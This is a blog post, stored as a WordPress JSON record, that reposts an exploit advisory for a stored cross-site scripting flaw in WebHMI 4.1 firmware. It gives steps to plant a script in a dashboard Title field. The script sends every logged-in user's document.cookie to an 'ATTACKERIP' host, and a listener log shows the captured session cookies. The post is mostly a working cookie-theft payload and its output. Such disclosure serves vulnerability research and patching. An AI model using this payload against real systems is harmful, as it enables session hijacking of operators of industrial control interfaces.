{"id":21029,"date":"2022-02-23T18:59:00","date_gmt":"2022-02-23T15:59:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166116\/webhmi41-xss.txt"},"modified":"2022-02-26T10:04:44","modified_gmt":"2022-02-26T06:34:44","slug":"webhmi-4-1-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/webhmi-4-1-cross-site-scripting\/","title":{"rendered":"WebHMI 4.1 Cross Site Scripting"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: WebHMI 4.1 &#8211; Stored Cross Site Scripting (XSS) (Authenticated)<br \/>\n# Date: 04\/01\/2022<br \/>\n# Exploit Author: Antonio Cuomo (arkantolo)<br \/>\n# Vendor Homepage: https:\/\/webhmi.com.ua\/en\/<br \/>\n# Version: WebHMI Firmware 4.1.1.7662<br \/>\n# Tested on: WebHMI Firmware 4.1.1.7662<\/p>\n<p dir=\"ltr\">#Steps to Reproduce<\/p>\n<p dir=\"ltr\">1. Login to admin account<\/p>\n<p dir=\"ltr\">2. Add a new register or create new dashboard<br \/>\ninsert payload<\/p>\n<p dir=\"ltr\">&lt;script&gt;var i=new Image;i.src=&#8221;http:\/\/ATTACKERIP\/?&#8221;+document.cookie;&lt;\/script&gt;<\/p>\n<p dir=\"ltr\">in Title field and save.<\/p>\n<p dir=\"ltr\"># Dashboard section impact instantly all logged users.<\/p>\n<p dir=\"ltr\">#Listener log:<br \/>\nGET \/?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP\/1.1<br \/>\nHost: 192.168.0.169:8080<br \/>\nConnection: keep-alive<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/96.0.4664.110 Safari\/537.36<br \/>\nAccept: image\/avif,image\/webp,image\/apng,image\/svg+xml,image\/*,*\/*;q=0.8<br \/>\nSec-GPC: 1<br \/>\nReferer: http:\/\/192.168.0.153\/<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WebHMI 4.1 &#8211; Stored Cross Site Scripting (XSS) (Authenticated) # Date: 04\/01\/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https:\/\/webhmi.com.ua\/en\/ # Version: WebHMI Firmware 4.1.1.7662 # Tested on: WebHMI Firmware 4.1.1.7662 #Steps to Reproduce 1. Login to admin account 2. Add a new register or create new dashboard insert payload &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21029","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21029","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21029"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21029\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21029"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21029"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21029"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}